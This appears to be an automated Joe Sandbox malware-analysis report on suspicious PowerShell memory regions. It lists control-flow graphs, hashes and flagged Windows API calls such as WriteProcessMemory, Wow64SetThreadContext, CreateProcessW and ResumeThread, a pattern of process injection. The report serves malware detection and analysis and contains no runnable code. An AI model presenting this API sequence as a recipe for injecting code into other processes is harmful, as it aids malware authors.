472 7ff848f208cc-7ff848f2095d 462->472 463->462 478 7ff848f203d9-7ff848f203e6 465->478 479 7ff848f203f3-7ff848f20402 465->479 466->465 475 7ff848f207d9-7ff848f207f1 471->475 476 7ff848f207f3-7ff848f20800 471->476 522 7ff848f2095f 472->522 523 7ff848f20960-7ff848f20971 472->523 475->476 490 7ff848f2086d-7ff848f20877 476->490 491 7ff848f20802-7ff848f20805 476->491 478->479 492 7ff848f203e8-7ff848f203f1 478->492 481->482 496 7ff848f2066c-7ff848f20684 482->496 497 7ff848f20686-7ff848f206dc 482->497 494 7ff848f20879-7ff848f20885 490->494 495 7ff848f20886-7ff848f208c9 490->495 491->490 498 7ff848f20807-7ff848f2080f 491->498 492->479 495->472 496->497 530 7ff848f206e3-7ff848f206f3 497->530 498->472 502 7ff848f20815-7ff848f2081f 498->502 505 7ff848f20838-7ff848f2083c 502->505 506 7ff848f20821-7ff848f20831 502->506 505->490 513 7ff848f2083e-7ff848f20866 505->513 506->505 515 7ff848f20867-7ff848f2086c 506->515 513->515 522->523 526 7ff848f20973 523->526 527 7ff848f20974-7ff848f209a8 523->527 526->527 531 7ff848f206fb-7ff848f2071e 530->531 531->449
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @+H
                                                              • API String ID: 0-1643726030
                                                              • Opcode ID: 7ebc4745b60e9094537c004a633c369f14a066e34f8e72182cd8fc1237bc2e53
                                                              • Instruction ID: 799dfa407ef03cef6f9a4c1207337145a5a96cc80a7cadaa2bbd94014567f39d
                                                              • Opcode Fuzzy Hash: 7ebc4745b60e9094537c004a633c369f14a066e34f8e72182cd8fc1237bc2e53
                                                              • Instruction Fuzzy Hash: F7722332A0EBC94FE35ABB2868555717BE1EF96250F0801FFD449CB1E3DA19AC06C356
                                                              Function 00007FF848E59D2D Relevance: 1.7, APIs: 1, Instructions: 213injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 532 7ff848e59d2d-7ff848e59d39 533 7ff848e59d3b-7ff848e59d43 532->533 534 7ff848e59d44-7ff848e59df1 532->534 533->534 537 7ff848e59e19-7ff848e59eb2 WriteProcessMemory 534->537 538 7ff848e59df3-7ff848e59e16 534->538 539 7ff848e59eba-7ff848e59f16 537->539 540 7ff848e59eb4 537->540 538->537 540->539
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: f0cf2df8d344406ecae48c2a7c9924ee4fccca2bedfa8622bf7e14e380cb5724
                                                              • Instruction ID: 4e78f21d34728b6b33278c5659d7979e8afe09af313911643e935c9bfed6c852
                                                              • Opcode Fuzzy Hash: f0cf2df8d344406ecae48c2a7c9924ee4fccca2bedfa8622bf7e14e380cb5724
                                                              • Instruction Fuzzy Hash: 19612370908A5C8FDB98EF98D884BE9BBF1FB69311F1041AED04DE3251DB74A985CB44
                                                              Function 00007FF848E56238 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 542 7ff848e56238-7ff848e56244 544 7ff848e5622b-7ff848e56233 542->544 545 7ff848e56246-7ff848e56256 542->545 544->542 547 7ff848e59d50-7ff848e59df1 544->547 550 7ff848e59e19-7ff848e59eb2 WriteProcessMemory 547->550 551 7ff848e59df3-7ff848e59e16 547->551 552 7ff848e59eba-7ff848e59f16 550->552 553 7ff848e59eb4 550->553 551->550 553->552
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 248eb57e991b96a4be8739b1cdf4fc1ca06f2eaa86ea464449be6ae4eb2c4e48
                                                              • Instruction ID: 3a9e7ed19bae4a8a50271ad353bab96cb06f814c1e5fc982253edac3159005d9
                                                              • Opcode Fuzzy Hash: 248eb57e991b96a4be8739b1cdf4fc1ca06f2eaa86ea464449be6ae4eb2c4e48
                                                              • Instruction Fuzzy Hash: A8510370908A5C8FDB98EF98D885BE9BBF1FB69301F1041AED04DE3251DB74A985CB44
                                                              Function 00007FF848E59829 Relevance: 1.7, APIs: 1, Instructions: 189threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 555 7ff848e59829-7ff848e59835 556 7ff848e59837-7ff848e5983f 555->556 557 7ff848e59840-7ff848e598f4 555->557 556->557 560 7ff848e59916-7ff848e5997f Wow64SetThreadContext 557->560 561 7ff848e598f6-7ff848e59913 557->561 562 7ff848e59987-7ff848e599d1 560->562 563 7ff848e59981 560->563 561->560 563->562
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 4c3b318dae27b37f6638ead1441fdae1fe14fda556ff1947e8b9555e3ffd93dc
                                                              • Instruction ID: 395ae3a6646c8f0e9b6d71bd04b238e41e8f0b1792592983fb84589964ea7b55
                                                              • Opcode Fuzzy Hash: 4c3b318dae27b37f6638ead1441fdae1fe14fda556ff1947e8b9555e3ffd93dc
                                                              • Instruction Fuzzy Hash: 81518F70D08A4D8FDB59EFA8D884BE9BBF1FB66311F1482AAD048D7255C7749885CF40
                                                              Function 00007FF848E595A9 Relevance: 1.7, APIs: 1, Instructions: 184processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 565 7ff848e595a9-7ff848e595b6 566 7ff848e5961e-7ff848e596ae CreateProcessW 565->566 567 7ff848e595b8-7ff848e5961d 565->567 568 7ff848e596b6-7ff848e597a4 call 7ff848e597a5 566->568 569 7ff848e596b0 566->569 567->566 569->568
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 4d7a2c02fb930cd406bbca812077e7a20306f280838bae9954c934bb1645dcde
                                                              • Instruction ID: 033972628d95d39e05f91a2af4f5759e9958c0b8749a68b5127869269b5f7fcd
                                                              • Opcode Fuzzy Hash: 4d7a2c02fb930cd406bbca812077e7a20306f280838bae9954c934bb1645dcde
                                                              • Instruction Fuzzy Hash: 3F51F770908A1D8FDBA8EF18D894BE9B7F1FB59310F1001AAD40DE3291DB35AA85CF45
                                                              Function 00007FF848E59F19 Relevance: 1.6, APIs: 1, Instructions: 139threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 646 7ff848e59f19-7ff848e59f25 647 7ff848e59f27-7ff848e59f2f 646->647 648 7ff848e59f30-7ff848e59ffa ResumeThread 646->648 647->648 651 7ff848e59ffc 648->651 652 7ff848e5a002-7ff848e5a040 648->652 651->652
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 6f38f2764b13a21831231deeaabda1c576b175d978e6c12c35d67f7ccb44dc85
                                                              • Instruction ID: 1975dc2cd1d461fef22dccedb1e23871a831a9c0ecc946229e4cb9f981f27334
                                                              • Opcode Fuzzy Hash: 6f38f2764b13a21831231deeaabda1c576b175d978e6c12c35d67f7ccb44dc85
                                                              • Instruction Fuzzy Hash: 3D414A7090C64C8FDB59DF98D885BE9BBB0FB5A310F1441AED049E7252DB74A885CB41
                                                              Function 00007FF848F20561 Relevance: .2, Instructions: 208COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1cd8efd4a34ceb41648868bb8c6bdacc1eed02b98840604b3c73a1f9e71f16c0
                                                              • Instruction ID: e6729837573ca9feff87c2ba2a810ed39aa473838b7125f823c340ecb1f8b68d
                                                              • Opcode Fuzzy Hash: 1cd8efd4a34ceb41648868bb8c6bdacc1eed02b98840604b3c73a1f9e71f16c0
                                                              • Instruction Fuzzy Hash: A2511532A1DA855FE358B72CA85A531BBD1EFD5750F1801BEE448C72D3EE15AC02838A
                                                              Function 00007FF848F20FFE Relevance: .2, Instructions: 195COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f598db96c5f53d909aac0592adcb7070a852e28713a485747c74106accc4311
                                                              • Instruction ID: 0fc1075a6be1d606af0c0068cbf165deb94c2902d6651430d531ec33e328c72c
                                                              • Opcode Fuzzy Hash: 0f598db96c5f53d909aac0592adcb7070a852e28713a485747c74106accc4311
                                                              • Instruction Fuzzy Hash: 63510332E1EE8A4FF7A9E7AC241167566D1FF457A0F5801BAD00AC71D3DE19BC444389
                                                              Function 00007FF848F22241 Relevance: .2, Instructions: 176COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 962 7ff848f22241-7ff848f2228f 964 7ff848f22429-7ff848f22493 962->964 965 7ff848f22295-7ff848f2229f 962->965 990 7ff848f22494-7ff848f224d5 964->990 966 7ff848f222b9-7ff848f222bf 965->966 967 7ff848f222a1-7ff848f222af 965->967 970 7ff848f223be-7ff848f223c8 966->970 971 7ff848f222c5-7ff848f222c8 966->971 967->966 972 7ff848f222b1-7ff848f222b7 967->972 976 7ff848f223db-7ff848f22426 970->976 977 7ff848f223ca-7ff848f223da 970->977 974 7ff848f222ca-7ff848f222dd 971->974 975 7ff848f22311 971->975 972->966 974->964 988 7ff848f222e3-7ff848f222ed 974->988 979 7ff848f22313-7ff848f22315 975->979 976->964 979->970 981 7ff848f2231b-7ff848f2231e 979->981 981->970 986 7ff848f22324-7ff848f22327 981->986 986->970 989 7ff848f2232d-7ff848f2236b 986->989 991 7ff848f222ef-7ff848f22304 988->991 992 7ff848f22306-7ff848f2230f 988->992 989->970 1004 7ff848f2236d-7ff848f22373 989->1004 1010 7ff848f224e1-7ff848f224ed 990->1010 1011 7ff848f224d7-7ff848f224dd 990->1011 991->992 992->979 1005 7ff848f22392-7ff848f223a8 1004->1005 1006 7ff848f22375-7ff848f22390 1004->1006 1009 7ff848f223ae-7ff848f223bd 1005->1009 1006->1005 1012 7ff848f224f9-7ff848f2250b 1010->1012 1013 7ff848f224ef-7ff848f224f5 1010->1013 1011->1010 1012->990 1015 7ff848f2250d-7ff848f22574 1012->1015 1013->1012 1019 7ff848f225bb-7ff848f225c5 1015->1019 1020 7ff848f22576-7ff848f225b8 1015->1020 1021 7ff848f225d0-7ff848f2261b 1019->1021 1022 7ff848f225c7-7ff848f225cf 1019->1022 1020->1019
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1064103addcc84f11d8b3facfa93b77512c7a015bbb237e4248a97f9bf5d2192
                                                              • Instruction ID: f2bf1c374ba4fec4d8fb66a5a0ff20612b443ad4f4afc1236a342f45dfefb43e
                                                              • Opcode Fuzzy Hash: 1064103addcc84f11d8b3facfa93b77512c7a015bbb237e4248a97f9bf5d2192
                                                              • Instruction Fuzzy Hash: C7514631D1DA894FE7A9EF68A851138B7E1EF96350F0805BED44DC71D3DB26AC118386
                                                              Function 00007FF848F214FA Relevance: .1, Instructions: 140COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0c243a896b81483ba7429f010881a6788621e7d3427dd5372fe48fbd34ffb3e9
                                                              • Instruction ID: 7fac778fdfc5db1532f2c2493a588db8a41b67c4323fc71825fede3b0e15e481
                                                              • Opcode Fuzzy Hash: 0c243a896b81483ba7429f010881a6788621e7d3427dd5372fe48fbd34ffb3e9
                                                              • Instruction Fuzzy Hash: 1441D432E1EE874FF3AAA7AC245627965D1EF516A1F5801F9D00EC31D2EF0EA884430D
                                                              Function 00007FF848F21A61 Relevance: .1, Instructions: 127COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1381 7ff848f21a61-7ff848f21aa4 1384 7ff848f21bc9-7ff848f21c2a 1381->1384 1385 7ff848f21aaa-7ff848f21ab4 1381->1385 1409 7ff848f21c2c-7ff848f21c79 1384->1409 1386 7ff848f21acd-7ff848f21ad2 1385->1386 1387 7ff848f21ab6-7ff848f21ac3 1385->1387 1389 7ff848f21ad8-7ff848f21adb 1386->1389 1390 7ff848f21b6a-7ff848f21b74 1386->1390 1387->1386 1392 7ff848f21ac5-7ff848f21acb 1387->1392 1389->1390 1393 7ff848f21ae1-7ff848f21ae4 1389->1393 1395 7ff848f21b83-7ff848f21bc6 1390->1395 1396 7ff848f21b76-7ff848f21b82 1390->1396 1392->1386 1398 7ff848f21b0b 1393->1398 1399 7ff848f21ae6-7ff848f21b09 1393->1399 1395->1384 1403 7ff848f21b0d-7ff848f21b0f 1398->1403 1399->1403 1403->1390 1404 7ff848f21b11-7ff848f21b1b 1403->1404 1404->1390 1412 7ff848f21b1d-7ff848f21b27 1404->1412 1423 7ff848f21c7b 1409->1423 1424 7ff848f21c7c-7ff848f21c8d 1409->1424 1414 7ff848f21b29-7ff848f21b33 1412->1414 1416 7ff848f21b3a-7ff848f21b43 1414->1416 1418 7ff848f21b5c-7ff848f21b69 1416->1418 1419 7ff848f21b45-7ff848f21b52 1416->1419 1419->1418 1422 7ff848f21b54-7ff848f21b5a 1419->1422 1422->1418 1423->1424 1425 7ff848f21c8f 1424->1425 1426 7ff848f21c90-7ff848f21ca3 1424->1426 1425->1426 1426->1409 1428 7ff848f21ca5-7ff848f21d29 1426->1428 1432 7ff848f21e7b-7ff848f21ee3 1428->1432 1433 7ff848f21d2f-7ff848f21d39 1428->1433 1456 7ff848f21ee4-7ff848f21eeb 1432->1456 1434 7ff848f21d3b-7ff848f21d50 1433->1434 1435 7ff848f21d52-7ff848f21d57 1433->1435 1434->1435 1437 7ff848f21e18-7ff848f21e22 1435->1437 1438 7ff848f21d5d-7ff848f21d60 1435->1438 1440 7ff848f21e33-7ff848f21e78 1437->1440 1441 7ff848f21e24-7ff848f21e32 1437->1441 1442 7ff848f21da9 1438->1442 1443 7ff848f21d62-7ff848f21d75 1438->1443 1440->1432 1445 7ff848f21dab-7ff848f21dad 1442->1445 1443->1432 1454 7ff848f21d7b-7ff848f21d85 1443->1454 1445->1437 1449 7ff848f21daf-7ff848f21db2 1445->1449 1449->1437 1452 7ff848f21db4-7ff848f21dba 1449->1452 1457 7ff848f21dd9-7ff848f21def 1452->1457 1458 7ff848f21dbc-7ff848f21dd7 1452->1458 1459 7ff848f21d9e-7ff848f21da7 1454->1459 1460 7ff848f21d87-7ff848f21d94 1454->1460 1467 7ff848f21eec-7ff848f21f2b 1456->1467 1469 7ff848f21e08-7ff848f21e17 1457->1469 1470 7ff848f21df1-7ff848f21dfe 1457->1470 1458->1457 1459->1445 1460->1459 1466 7ff848f21d96-7ff848f21d9c 1460->1466 1466->1459 1478 7ff848f21f2d 1467->1478 1479 7ff848f21f32-7ff848f21f43 1467->1479 1470->1469 1474 7ff848f21e00-7ff848f21e06 1470->1474 1474->1469 1478->1479 1480 7ff848f21f2f 1478->1480 1481 7ff848f21f4a-7ff848f21f5b 1479->1481 1482 7ff848f21f45 1479->1482 1480->1479 1481->1456 1483 7ff848f21f5d-7ff848f21f63 1481->1483 1482->1481 1484 7ff848f21f47 1482->1484 1483->1467 1485 7ff848f21f65-7ff848f21f80 1483->1485 1484->1481 1487 7ff848f21fa0-7ff848f21fd9 1485->1487 1488 7ff848f21f82-7ff848f21f9f 1485->1488 1491 7ff848f22128-7ff848f22198 1487->1491 1492 7ff848f21fdf-7ff848f21fe9 1487->1492 1488->1487 1525 7ff848f2219c-7ff848f221d7 1491->1525 1493 7ff848f21feb-7ff848f22000 1492->1493 1494 7ff848f22002-7ff848f22007 1492->1494 1493->1494 1497 7ff848f2200d-7ff848f22010 1494->1497 1498 7ff848f220c5-7ff848f220cf 1494->1498 1502 7ff848f22059 1497->1502 1503 7ff848f22012-7ff848f22025 1497->1503 1500 7ff848f220d1-7ff848f220df 1498->1500 1501 7ff848f220e0-7ff848f22125 1498->1501 1501->1491 1505 7ff848f2205b-7ff848f2205d 1502->1505 1503->1491 1511 7ff848f2202b-7ff848f22035 1503->1511 1505->1498 1510 7ff848f2205f-7ff848f22062 1505->1510 1510->1498 1513 7ff848f22064-7ff848f2206a 1510->1513 1515 7ff848f2204e-7ff848f22057 1511->1515 1516 7ff848f22037-7ff848f22044 1511->1516 1517 7ff848f22089-7ff848f2209c 1513->1517 1518 7ff848f2206c-7ff848f22087 1513->1518 1515->1505 1516->1515 1524 7ff848f22046-7ff848f2204c 1516->1524 1526 7ff848f2209e-7ff848f220ab 1517->1526 1527 7ff848f220b5-7ff848f220c4 1517->1527 1518->1517 1524->1515 1536 7ff848f221d9 1525->1536 1537 7ff848f221de-7ff848f221ef 1525->1537 1526->1527 1532 7ff848f220ad-7ff848f220b3 1526->1532 1532->1527 1536->1537 1538 7ff848f221db 1536->1538 1539 7ff848f221f1 1537->1539 1540 7ff848f221f6-7ff848f22213 1537->1540 1538->1537 1539->1540 1541 7ff848f221f3 1539->1541 1540->1525 1542 7ff848f22215-7ff848f2228f 1540->1542 1541->1540 1545 7ff848f22429-7ff848f22493 1542->1545 1546 7ff848f22295-7ff848f2229f 1542->1546 1571 7ff848f22494-7ff848f224d5 1545->1571 1547 7ff848f222b9-7ff848f222bf 1546->1547 1548 7ff848f222a1-7ff848f222af 1546->1548 1551 7ff848f223be-7ff848f223c8 1547->1551 1552 7ff848f222c5-7ff848f222c8 1547->1552 1548->1547 1553 7ff848f222b1-7ff848f222b7 1548->1553 1557 7ff848f223db-7ff848f22426 1551->1557 1558 7ff848f223ca-7ff848f223da 1551->1558 1555 7ff848f222ca-7ff848f222dd 1552->1555 1556 7ff848f22311 1552->1556 1553->1547 1555->1545 1569 7ff848f222e3-7ff848f222ed 1555->1569 1560 7ff848f22313-7ff848f22315 1556->1560 1557->1545 1560->1551 1562 7ff848f2231b-7ff848f2231e 1560->1562 1562->1551 1567 7ff848f22324-7ff848f22327 1562->1567 1567->1551 1570 7ff848f2232d-7ff848f2236b 1567->1570 1572 7ff848f222ef-7ff848f22304 1569->1572 1573 7ff848f22306-7ff848f2230f 1569->1573 1570->1551 1585 7ff848f2236d-7ff848f22373 1570->1585 1591 7ff848f224e1-7ff848f224ed 1571->1591 1592 7ff848f224d7-7ff848f224dd 1571->1592 1572->1573 1573->1560 1586 7ff848f22392-7ff848f223a8 1585->1586 1587 7ff848f22375-7ff848f22390 1585->1587 1590 7ff848f223ae-7ff848f223bd 1586->1590 1587->1586 1593 7ff848f224f9-7ff848f2250b 1591->1593 1594 7ff848f224ef-7ff848f224f5 1591->1594 1592->1591 1593->1571 1596 7ff848f2250d-7ff848f22574 1593->1596 1594->1593 1600 7ff848f225bb-7ff848f225c5 1596->1600 1601 7ff848f22576-7ff848f225b8 1596->1601 1602 7ff848f225d0-7ff848f2261b 1600->1602 1603 7ff848f225c7-7ff848f225cf 1600->1603 1601->1600
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65e780a5ff97a3f97661b343aee034e207f09f93fea2b76afb2837a19c783233
                                                              • Instruction ID: d315f27aa6cfff8e0d11a9892d43fb9528808a003c018a12ecb804a6203c9f92
                                                              • Opcode Fuzzy Hash: 65e780a5ff97a3f97661b343aee034e207f09f93fea2b76afb2837a19c783233
                                                              • Instruction Fuzzy Hash: 32316B31E1EE890FE7B9B7A8245927577E5EF55781F0801BAD40DC31C2EE1A7C45828E
                                                              Function 00007FF848F2104A Relevance: .1, Instructions: 115COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1611 7ff848f2104a-7ff848f21056 1613 7ff848f2115a-7ff848f21164 1611->1613 1614 7ff848f2105c-7ff848f21093 1611->1614 1616 7ff848f21173-7ff848f211b6 1613->1616 1617 7ff848f21166-7ff848f21172 1613->1617 1624 7ff848f21095-7ff848f210b5 1614->1624 1625 7ff848f210b7 1614->1625 1626 7ff848f210b9-7ff848f210bb 1624->1626 1625->1626 1626->1613 1628 7ff848f210c1-7ff848f210c4 1626->1628 1628->1613 1630 7ff848f210ca-7ff848f21104 1628->1630 1635 7ff848f21120-7ff848f21123 1630->1635 1636 7ff848f21106-7ff848f2111e 1630->1636 1638 7ff848f2112a-7ff848f21133 1635->1638 1636->1635 1640 7ff848f2114c-7ff848f21159 1638->1640 1641 7ff848f21135-7ff848f21142 1638->1641 1641->1640 1643 7ff848f21144-7ff848f2114a 1641->1643 1643->1640
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55509e6078e364d72d11f4c995f81568904d39b2b0a6b88371891ae4f2b81fa7
                                                              • Instruction ID: 226bc9453e7dd17729b2055cf0f2471461256192f2a0061ea5e7669afb34aa50
                                                              • Opcode Fuzzy Hash: 55509e6078e364d72d11f4c995f81568904d39b2b0a6b88371891ae4f2b81fa7
                                                              • Instruction Fuzzy Hash: F631EE32E1EA8A4FF7A9B7AC246127865D1FF416E1F5801BAD409C31D3DE1EAC84435E

                                                              Executed Functions

                                                              Function 00007FF848E733B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2155448675.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848e70000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction ID: 24ef75c526cb65825109a4e7586d62867e1718cfd4eae63a3c90891dd0916743
                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction Fuzzy Hash: CF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3691DB36E882CB45

                                                              Execution Graph

                                                              Execution Coverage:12%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:204
                                                              Total number of Limit Nodes:17
                                                              execution_graph 32610 14a75f8 DuplicateHandle 32611 14a768e 32610->32611 32612 14a23b8 32614 14a23fc SetWindowsHookExW 32612->32614 32615 14a2442 32614->32615 32616 145d0fc 32617 145d114 32616->32617 32618 145d16e 32617->32618 32624 59533d0 32617->32624 32629 59526c8 32617->32629 32635 59526b8 32617->32635 32641 5953438 32617->32641 32646 5953429 32617->32646 32625 59533d4 32624->32625 32625->32618 32626 59533fa 32625->32626 32651 59539a3 32625->32651 32656 59539c8 32625->32656 32626->32618 32630 59526c9 32629->32630 32632 59533d0 2 API calls 32630->32632 32633 5953429 2 API calls 32630->32633 32634 5953438 2 API calls 32630->32634 32631 595270f 32631->32618 32632->32631 32633->32631 32634->32631 32636 59526bc 32635->32636 32638 59533d0 2 API calls 32636->32638 32639 5953429 2 API calls 32636->32639 32640 5953438 2 API calls 32636->32640 32637 595270f 32637->32618 32638->32637 32639->32637 32640->32637 32642 5953439 32641->32642 32643 5953497 32642->32643 32644 59539a3 2 API calls 32642->32644 32645 59539c8 2 API calls 32642->32645 32644->32643 32645->32643 32647 595342c 32646->32647 32648 5953497 32647->32648 32649 59539a3 2 API calls 32647->32649 32650 59539c8 2 API calls 32647->32650 32649->32648 32650->32648 32653 59539c4 32651->32653 32652 5953a68 32652->32626 32661 5953a80 32653->32661 32665 5953a70 32653->32665 32658 59539c9 32656->32658 32657 5953a68 32657->32626 32659 5953a80 2 API calls 32658->32659 32660 5953a70 2 API calls 32658->32660 32659->32657 32660->32657 32662 5953a81 32661->32662 32664 5953a91 32662->32664 32669 5954c26 32662->32669 32664->32652 32666 5953a74 32665->32666 32667 5953a91 32666->32667 32668 5954c26 2 API calls 32666->32668 32667->32652 32668->32667 32670 5954c44 32669->32670 32674 5954c61 32670->32674 32678 5954c70 32670->32678 32671 5954c5a 32671->32664 32675 5954cb2 32674->32675 32677 5954cb9 32674->32677 32676 5954d0a CallWindowProcW 32675->32676 32675->32677 32676->32677 32677->32671 32679 5954cb2 32678->32679 32681 5954cb9 32678->32681 32680 5954d0a CallWindowProcW 32679->32680 32679->32681 32680->32681 32681->32671 32437 14a7c10 32439 14a7c3e 32437->32439 32441 14a71c4 32439->32441 32440 14a7c5e 32440->32440 32442 14a71cf 32441->32442 32443 14a8784 32442->32443 32446 14aa410 32442->32446 32451 14aa420 32442->32451 32443->32440 32447 14aa441 32446->32447 32448 14aa465 32447->32448 32456 14aa5bf 32447->32456 32460 14aa5d0 32447->32460 32448->32443 32453 14aa441 32451->32453 32452 14aa465 32452->32443 32453->32452 32454 14aa5bf 4 API calls 32453->32454 32455 14aa5d0 4 API calls 32453->32455 32454->32452 32455->32452 32457 14aa5dd 32456->32457 32458 14aa616 32457->32458 32464 14a83f4 32457->32464 32458->32448 32463 14aa5dd 32460->32463 32461 14aa616 32461->32448 32462 14a83f4 4 API calls 32462->32461 32463->32461 32463->32462 32465 14a83ff 32464->32465 32467 14aa688 32465->32467 32468 14a8428 32465->32468 32467->32467 32469 14a8433 32468->32469 32475 14a8438 32469->32475 32471 14aa6f7 32479 5950040 32471->32479 32488 5950006 32471->32488 32472 14aa731 32472->32467 32476 14a8443 32475->32476 32477 14abc78 32476->32477 32478 14aa420 4 API calls 32476->32478 32477->32471 32478->32477 32481 5950071 32479->32481 32482 5950171 32479->32482 32480 595007d 32480->32472 32481->32480 32496 59502b8 32481->32496 32500 59502a8 32481->32500 32482->32472 32483 59500bd 32504 59515c9 32483->32504 32508 59515d8 32483->32508 32489 5950034 32488->32489 32490 595007d 32489->32490 32492 59502b8 2 API calls 32489->32492 32493 59502a8 2 API calls 32489->32493 32490->32472 32491 59500bd 32494 59515c9 2 API calls 32491->32494 32495 59515d8 2 API calls 32491->32495 32492->32491 32493->32491 32494->32490 32495->32490 32497 59502b9 32496->32497 32512 59502f8 